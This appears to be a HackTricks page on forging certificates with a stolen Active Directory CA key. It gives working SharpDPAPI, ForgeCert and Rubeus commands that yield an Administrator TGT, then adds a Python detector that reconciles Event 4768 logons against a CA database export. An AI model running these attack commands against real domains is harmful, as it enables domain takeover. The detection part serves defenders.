hacktricks/windows-hardening/active-directory-methodology/forged-certificates.md
2022-08-15 19:31:10 +00:00

Forged Certificates

Support HackTricks and get benefits!

Do you work in a cybersecurity company? Do you want to see your company advertised in HackTricks? or do you want to have access the latest version of the PEASS or download HackTricks in PDF? Check the SUBSCRIPTION PLANS!

Discover The PEASS Family, our collection of exclusive NFTs

Get the official PEASS & HackTricks swag

Join the 💬 Discord group or the telegram group or follow me on Twitter 🐦@carlospolopm.

Share your hacking tricks submitting PRs to the hacktricks github repo.

Forged Certificates

Gaining local admin access to a CA allows an attacker to extract the CA private key, which can be used to sign a forged certificate (think of this like the krbtgt hash being able to sign a forged TGT). The default validity period for a CA private key is 5 years, but this can obviously be set to any value during setup, sometimes as high as 10+ years.

Once on a CA, SharpDPAPI can extract the private keys.

```
.\SharpDPAPI.exe certificates /machine
# If Issuer and Subject are the distinguished name of the CA, that's the one
```

Then, save the output to a .pem file and convert it to a .pfx with openssl on Kali.

Build the forged certificate with ForgeCert:

```
.\ForgeCert.exe --CaCertPath ca.pfx --CaCertPassword "password" --Subject "CN=User" --SubjectAltName "Administrator@cyberbotic.io" --NewCertPath fake.pfx --NewCertPassword "password"
```

Even though you can specify any SubjectAltName, the user does need to be present in AD. In this example, the default Administrator account is used.

Then we can simply use Rubeus to request a legitimate TGT with this forged certificate and use it to access the domain controller:

```
.\Rubeus.exe asktgt /user:Administrator /domain:cyberbotic.io /certificate:MIACAQ[...snip...]IEAAAA /password:password /nowrap
```

{% hint style="warning" %} Note that you aren't limited to forging user certificates; the same can be done for machine certificates. Combine this with the S4U2self trick to gain access to any machine or service in the domain. {% endhint %}
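From the defender's side, the property that makes a forged certificate detectable is the one the page describes: it is signed with the real CA key, so its issuer name is legitimate, but it never passed through the CA's request pipeline and therefore has no row in the CA database. Kerberos Event ID 4768 records the issuer name, serial number and thumbprint of any certificate used for PKINIT, which allows every certificate-based TGT request to be reconciled against the CA's issued-certificate list. The Python below is an added example, not part of the original HackTricks page and not code from SharpDPAPI, ForgeCert or Rubeus; the 4768 messages and the CA export are constructed samples, and the CSV column names follow a `certutil -view`-style export only as an assumption to adjust to your own export.

```python
"""
Reconcile certificate-based TGT requests (Event ID 4768) against the CA's
issued-certificate database. A forged ("golden") certificate has a valid
issuer but no CA database row, so its serial number is never found; a forged
certificate that reuses a real serial is caught by the thumbprint mismatch.
"""
import csv
import io
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# Constructed 4768 message bodies in the shape of the Windows Security log text.
SAMPLE_EVENTS = [
    # Legitimate PKINIT logon: serial and thumbprint both match the CA database.
    "A Kerberos authentication ticket (TGT) was requested.\n"
    "Account Information:\n\tAccount Name:\t\tjsmith\n\tSupplied Realm Name:\tCYBERBOTIC.IO\n"
    "Certificate Information:\n\tCertificate Issuer Name:\t\tcyberbotic-DC-CA\n"
    "\tCertificate Serial Number:\t6100000003A1B2C3D403\n"
    "\tCertificate Thumbprint:\t\tAB12CD34EF56AB12CD34EF56AB12CD34EF56AB12\n",
    # Password-based logon: the certificate fields are present but empty.
    "A Kerberos authentication ticket (TGT) was requested.\n"
    "Account Information:\n\tAccount Name:\t\tDC01$\n\tSupplied Realm Name:\tCYBERBOTIC.IO\n"
    "Certificate Information:\n\tCertificate Issuer Name:\t\n"
    "\tCertificate Serial Number:\t\n\tCertificate Thumbprint:\t\t\n",
    # Forged certificate: legitimate issuer name, serial unknown to the CA.
    "A Kerberos authentication ticket (TGT) was requested.\n"
    "Account Information:\n\tAccount Name:\t\tAdministrator\n\tSupplied Realm Name:\tCYBERBOTIC.IO\n"
    "Certificate Information:\n\tCertificate Issuer Name:\t\tcyberbotic-DC-CA\n"
    "\tCertificate Serial Number:\t4F2A91C7E3B06D1855A2\n"
    "\tCertificate Thumbprint:\t\tDEADBEEFDEADBEEFDEADBEEFDEADBEEFDEADBEEF\n",
    # Forged certificate reusing a real serial: the thumbprint gives it away.
    "A Kerberos authentication ticket (TGT) was requested.\n"
    "Account Information:\n\tAccount Name:\t\tsvc_backup\n\tSupplied Realm Name:\tCYBERBOTIC.IO\n"
    "Certificate Information:\n\tCertificate Issuer Name:\t\tcyberbotic-DC-CA\n"
    "\tCertificate Serial Number:\t6100000004A1B2C3D404\n"
    "\tCertificate Thumbprint:\t\t1111222233334444555566667777888899990000\n",
]

# Constructed CA database export; column names are an assumption (certutil -view style).
CA_DB_CSV = """\
"Request ID","Serial Number","Certificate Hash","Requester Name"
"17","61 00 00 00 03 a1 b2 c3 d4 03","ab 12 cd 34 ef 56 ab 12 cd 34 ef 56 ab 12 cd 34 ef 56 ab 12","CYBERBOTIC\\jsmith"
"18","61 00 00 00 04 a1 b2 c3 d4 04","0f 1e 2d 3c 4b 5a 69 78 87 96 a5 b4 c3 d2 e1 f0 0f 1e 2d 3c","CYBERBOTIC\\svc_backup"
"""

# Issuer names of the enterprise CAs you actually operate (constructed value).
TRUSTED_ISSUERS = {"cyberbotic-DC-CA"}


@dataclass(frozen=True)
class CertLogon:
    account: str
    issuer: str
    serial: str      # normalized: upper-case hex, separators removed
    thumbprint: str  # normalized the same way


# Each field is captured only up to the end of its own line, so an empty value
# (password logon) does not swallow the next field's label.
_FIELDS = {
    "account": re.compile(r"Account Name:[ \t]*([^\r\n]*)"),
    "issuer": re.compile(r"Certificate Issuer Name:[ \t]*([^\r\n]*)"),
    "serial": re.compile(r"Certificate Serial Number:[ \t]*([^\r\n]*)"),
    "thumbprint": re.compile(r"Certificate Thumbprint:[ \t]*([^\r\n]*)"),
}


def normalize_hex(value: str) -> str:
    """Upper-case hex with spaces/colons removed, so log and certutil spellings compare equal."""
    return re.sub(r"[^0-9A-Fa-f]", "", value).upper()


def parse_4768(message: str) -> Optional[CertLogon]:
    """Return the certificate details of a 4768 message, or None for non-PKINIT logons."""
    values = {}
    for key, pattern in _FIELDS.items():
        match = pattern.search(message)
        values[key] = match.group(1).strip() if match else ""
    if not values["serial"]:
        return None
    return CertLogon(values["account"], values["issuer"],
                     normalize_hex(values["serial"]), normalize_hex(values["thumbprint"]))


def load_ca_database(csv_text: str) -> Dict[str, str]:
    """Map normalized serial number -> normalized certificate hash from the CA export."""
    issued = {}
    for row in csv.DictReader(io.StringIO(csv_text)):
        issued[normalize_hex(row["Serial Number"])] = normalize_hex(row["Certificate Hash"])
    return issued


def reconcile(messages: List[str], csv_text: str, trusted_issuers) -> List[Tuple[CertLogon, str]]:
    """Flag certificate logons whose certificate the CA has no matching record of."""
    issued = load_ca_database(csv_text)
    findings = []
    for message in messages:
        logon = parse_4768(message)
        if logon is None:
            continue  # password-based TGT request, nothing to reconcile
        if logon.issuer not in trusted_issuers:
            findings.append((logon, "issuer is not a known enterprise CA"))
        elif logon.serial not in issued:
            findings.append((logon, "serial number absent from CA database"))
        elif issued[logon.serial] != logon.thumbprint:
            findings.append((logon, "thumbprint does not match CA record for this serial"))
    return findings


if __name__ == "__main__":
    for logon, reason in reconcile(SAMPLE_EVENTS, CA_DB_CSV, TRUSTED_ISSUERS):
        print(f"{logon.account}: {reason} (issuer={logon.issuer}, serial={logon.serial})")
```

Run against real data, the inputs would be the 4768 messages exported from the domain controllers and the CSV produced by the CA's own database export; the reconciliation is only as good as the freshness of that export, so it should be taken after the time window of the events being checked.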
